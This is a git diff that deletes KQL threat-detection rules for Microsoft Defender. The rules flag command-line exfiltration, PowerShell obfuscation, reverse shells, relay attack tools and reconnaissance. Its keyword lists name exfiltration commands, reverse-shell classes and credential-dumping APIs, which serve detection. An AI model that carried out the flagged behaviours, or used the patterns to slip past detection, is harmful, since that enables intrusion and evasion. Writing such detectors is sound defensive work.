\ No newline at end of file
diff --git a/Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql b/Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql
deleted file mode 100644
index 33ee0fa7..00000000
--- a/Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/02
-// Level: high
-// Description: Detects the use of various CLI utilities exfiltrating data via web requests
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl ") and (ProcessCommandLine contains " -ur" and ProcessCommandLine contains " -me" and ProcessCommandLine contains " -b" and ProcessCommandLine contains " POST ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or ((ProcessCommandLine contains "--ur" and FolderPath endswith "\\curl.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " --data ")) or ((ProcessCommandLine contains "--post-data" or ProcessCommandLine contains "--post-file") and FolderPath endswith "\\wget.exe")) and ((ProcessCommandLine contains "Get-Content" or ProcessCommandLine contains "GetBytes" or ProcessCommandLine contains "hostname" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "net view" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "qprocess" or ProcessCommandLine contains "sc query" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "ToBase64String" or ProcessCommandLine contains "whoami") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > " and ProcessCommandLine contains " C:\\"))
\ No newline at end of file
diff --git a/Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql b/Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql
deleted file mode 100644
index 0f2eb648..00000000
--- a/Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/07/31
-// Level: medium
-// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
-// Tags: attack.discovery, attack.execution, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/Execution/Potential_Dosfuscation_Activity.kql b/Execution/Potential_Dosfuscation_Activity.kql
deleted file mode 100644
index d84c9691..00000000
--- a/Execution/Potential_Dosfuscation_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/02/15
-// Level: medium
-// Description: Detects possible payload obfuscation via the commandline
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains "^^" or ProcessCommandLine contains "^|^" or ProcessCommandLine contains ",;," or ProcessCommandLine contains ";;;;" or ProcessCommandLine contains ";; ;;" or ProcessCommandLine contains "(,(," or ProcessCommandLine contains "%COMSPEC:~" or ProcessCommandLine contains " c^m^d" or ProcessCommandLine contains "^c^m^d" or ProcessCommandLine contains " c^md" or ProcessCommandLine contains " cm^d" or ProcessCommandLine contains "^cm^d" or ProcessCommandLine contains " s^et " or ProcessCommandLine contains " s^e^t " or ProcessCommandLine contains " se^t "
\ No newline at end of file
diff --git a/Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql b/Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql
deleted file mode 100644
index a07c661e..00000000
--- a/Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: low
-// Description: Detects specific combinations of encoding methods in PowerShell via the commandline
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join")))
\ No newline at end of file
diff --git a/Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql b/Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql
deleted file mode 100644
index 45a8fd0c..00000000
--- a/Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: medium
-// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
-The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http"
\ No newline at end of file
diff --git a/Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql b/Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql
deleted file mode 100644
index 7010220a..00000000
--- a/Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/04/08
-// Level: high
-// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
deleted file mode 100644
index 96f4cd8e..00000000
--- a/Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/14
-// Level: medium
-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe")
\ No newline at end of file
diff --git a/Execution/Potential_PowerShell_Command_Line_Obfuscation.kql b/Execution/Potential_PowerShell_Command_Line_Obfuscation.kql
deleted file mode 100644
index 901cfc87..00000000
--- a/Execution/Potential_PowerShell_Command_Line_Obfuscation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)
-// Date: 2020/10/15
-// Level: high
-// Description: Detects the PowerShell command lines with special characters
-// Tags: attack.execution, attack.defense_evasion, attack.t1027, attack.t1059.001
-DeviceProcessEvents
-| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);"))))
\ No newline at end of file
diff --git a/Execution/Potential_PowerShell_Downgrade_Attack.kql b/Execution/Potential_PowerShell_Downgrade_Attack.kql
deleted file mode 100644
index 1a70acae..00000000
--- a/Execution/Potential_PowerShell_Downgrade_Attack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Harish Segar (rule)
-// Date: 2020/03/20
-// Level: medium
-// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
-// Tags: attack.defense_evasion, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql b/Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql
deleted file mode 100644
index b0d3f76d..00000000
--- a/Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: high
-// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc ")))
\ No newline at end of file
diff --git a/Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql b/Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql
deleted file mode 100644
index 94151df4..00000000
--- a/Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/07/09
-// Level: high
-// Description: Detects suspicious encoded character syntax often used for defense evasion
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains "(WCHAR)0x"
\ No newline at end of file
diff --git a/Execution/Potential_Powershell_ReverseShell_Connection.kql b/Execution/Potential_Powershell_ReverseShell_Connection.kql
deleted file mode 100644
index 62c86967..00000000
--- a/Execution/Potential_Powershell_ReverseShell_Connection.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/03/03
-// Level: high
-// Description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " Net.Sockets.TCPClient" and ProcessCommandLine contains ".GetStream(" and ProcessCommandLine contains ".Write(") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 1bbe2f01..00000000
--- a/Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
-// Date: 2023/02/14
-// Level: medium
-// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
-// Tags: attack.execution, attack.t1047, car.2016-03-002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "AntiVirusProduct" or ProcessCommandLine contains "FirewallProduct") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 82b19961..00000000
--- a/Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali
-// Date: 2023/02/14
-// Level: medium
-// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where ProcessCommandLine contains "Product" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Potential_RDP_Session_Hijacking_Activity.kql b/Execution/Potential_RDP_Session_Hijacking_Activity.kql
deleted file mode 100644
index b2e0b52b..00000000
--- a/Execution/Potential_RDP_Session_Hijacking_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @juju4
-// Date: 2022/12/27
-// Level: medium
-// Description: Detects potential RDP Session Hijacking activity on Windows systems
-// Tags: attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\tscon.exe" or ProcessVersionInfoOriginalFileName =~ "tscon.exe") and ProcessIntegrityLevel =~ "SYSTEM"
\ No newline at end of file
diff --git a/Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
deleted file mode 100644
index 439202c1..00000000
--- a/Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: blueteamer8699
-// Date: 2022/01/03
-// Level: medium
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql b/Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql
deleted file mode 100644
index 6e6b74ac..00000000
--- a/Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/30
-// Level: medium
-// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
-// Tags: attack.execution, attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")
\ No newline at end of file
diff --git a/Execution/Potential_Renamed_Rundll32_Execution.kql b/Execution/Potential_Renamed_Rundll32_Execution.kql
deleted file mode 100644
index 195901b1..00000000
--- a/Execution/Potential_Renamed_Rundll32_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/22
-// Level: high
-// Description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "DllRegisterServer" and (not(FolderPath endswith "\\rundll32.exe"))
\ No newline at end of file
diff --git a/Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql b/Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql
deleted file mode 100644
index d7b1df2c..00000000
--- a/Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/24
-// Level: critical
-// Description: Detects different hacktools used for relay attacks on Windows for privilege escalation
-// Tags: attack.execution, attack.t1557.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains ".exe -c \"{" and ProcessCommandLine endswith "}\" -z") or (FolderPath contains "PetitPotam" or FolderPath contains "RottenPotato" or FolderPath contains "HotPotato" or FolderPath contains "JuicyPotato" or FolderPath contains "\\just_dce_" or FolderPath contains "Juicy Potato" or FolderPath contains "\\temp\\rot.exe" or FolderPath contains "\\Potato.exe" or FolderPath contains "\\SpoolSample.exe" or FolderPath contains "\\Responder.exe" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\LocalPotato") or (ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains " smbrelay" or ProcessCommandLine contains " ntlmrelay" or ProcessCommandLine contains "cme smb " or ProcessCommandLine contains " /ntlm:NTLMhash " or ProcessCommandLine contains "Invoke-PetitPotam" or (ProcessCommandLine contains ".exe -t " and ProcessCommandLine contains " -p "))) and (not((FolderPath contains "HotPotatoes6" or FolderPath contains "HotPotatoes7" or FolderPath contains "HotPotatoes ")))
\ No newline at end of file
diff --git a/Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql b/Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql
deleted file mode 100644
index 5c5ff61b..00000000
--- a/Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: medium
-// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql b/Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql
deleted file mode 100644
index b329e821..00000000
--- a/Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Joseph Kamau
-// Date: 2024/05/27
-// Level: medium
-// Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
-
-// Tags: attack.execution, attack.t1204.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\maxthon.exe" or FolderPath endswith "\\seamonkey.exe" or FolderPath endswith "\\vivaldi.exe" or FolderPath startswith "") and (InitiatingProcessFolderPath contains "Acrobat Reader" or InitiatingProcessFolderPath contains "Microsoft Office" or InitiatingProcessFolderPath contains "PDF Reader")
\ No newline at end of file
diff --git a/Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index a96027da..00000000
--- a/Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/20
-// Level: medium
-// Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (ProcessCommandLine contains " service get " and ProcessCommandLine contains "name,displayname,pathname,startmode") and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql b/Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql
deleted file mode 100644
index 0fec1416..00000000
--- a/Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: megan201296
-// Date: 2019/02/13
-// Level: high
-// Description: Detects registry keys related to Ursnif malware.
-// Tags: attack.execution, attack.t1112
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and RegistryKey contains "\\Software\\AppDataLow\\Software\\Microsoft") and (not((RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\Internet Explorer" or RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\RepService" or RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\IME" or RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\Edge")))
\ No newline at end of file
diff --git a/Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql b/Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql
deleted file mode 100644
index e0957f2c..00000000
--- a/Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis @Karneades
-// Date: 2019/04/03
-// Level: medium
-// Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.
-// Tags: attack.execution, attack.t1047, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe"
\ No newline at end of file
diff --git a/Execution/Potential_WinAPI_Calls_Via_CommandLine.kql b/Execution/Potential_WinAPI_Calls_Via_CommandLine.kql
deleted file mode 100644
index ea6c5d19..00000000
--- a/Execution/Potential_WinAPI_Calls_Via_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/06 -// Level: high -// Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec -// Tags: attack.execution, attack.t1106 -DeviceProcessEvents -| where (ProcessCommandLine contains "AddSecurityPackage" or ProcessCommandLine contains "AdjustTokenPrivileges" or ProcessCommandLine contains "Advapi32" or ProcessCommandLine contains "CloseHandle" or ProcessCommandLine contains "CreateProcessWithToken" or ProcessCommandLine contains "CreatePseudoConsole" or ProcessCommandLine contains "CreateRemoteThread" or ProcessCommandLine contains "CreateThread" or ProcessCommandLine contains "CreateUserThread" or ProcessCommandLine contains "DangerousGetHandle" or ProcessCommandLine contains "DuplicateTokenEx" or ProcessCommandLine contains "EnumerateSecurityPackages" or ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "FreeLibrary" or ProcessCommandLine contains "GetDelegateForFunctionPointer" or ProcessCommandLine contains "GetLogonSessionData" or ProcessCommandLine contains "GetModuleHandle" or ProcessCommandLine contains "GetProcAddress" or ProcessCommandLine contains "GetProcessHandle" or ProcessCommandLine contains "GetTokenInformation" or ProcessCommandLine contains "ImpersonateLoggedOnUser" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "LoadLibrary" or ProcessCommandLine contains "memcpy" or ProcessCommandLine contains "MiniDumpWriteDump" or ProcessCommandLine contains "ntdll" or ProcessCommandLine contains "OpenDesktop" or ProcessCommandLine contains "OpenProcess" or ProcessCommandLine contains "OpenProcessToken" or ProcessCommandLine contains "OpenThreadToken" or ProcessCommandLine contains "OpenWindowStation" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "QueueUserApc" or ProcessCommandLine contains "ReadProcessMemory" or ProcessCommandLine 
contains "RevertToSelf" or ProcessCommandLine contains "RtlCreateUserThread" or ProcessCommandLine contains "secur32" or ProcessCommandLine contains "SetThreadToken" or ProcessCommandLine contains "VirtualAlloc" or ProcessCommandLine contains "VirtualFree" or ProcessCommandLine contains "VirtualProtect" or ProcessCommandLine contains "WaitForSingleObject" or ProcessCommandLine contains "WriteInt32" or ProcessCommandLine contains "WriteProcessMemory" or ProcessCommandLine contains "ZeroFreeGlobalAllocUnicode") and (not((ProcessCommandLine contains "GetLoadLibraryWAddress32" and FolderPath endswith "\\MpCmdRun.exe"))) \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql b/Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql deleted file mode 100644 index 25ef6289..00000000 --- a/Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/12 -// Level: medium -// Description: Detects potentially suspicious child processes of a ClickOnce deployment application -// Tags: attack.execution, attack.defense_evasion -DeviceProcessEvents -| where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\" \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql b/Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql deleted file mode 100644 index 4dc7fab5..00000000 --- a/Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/26 -// Level: medium -// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\")) \ No newline at end of file diff --git 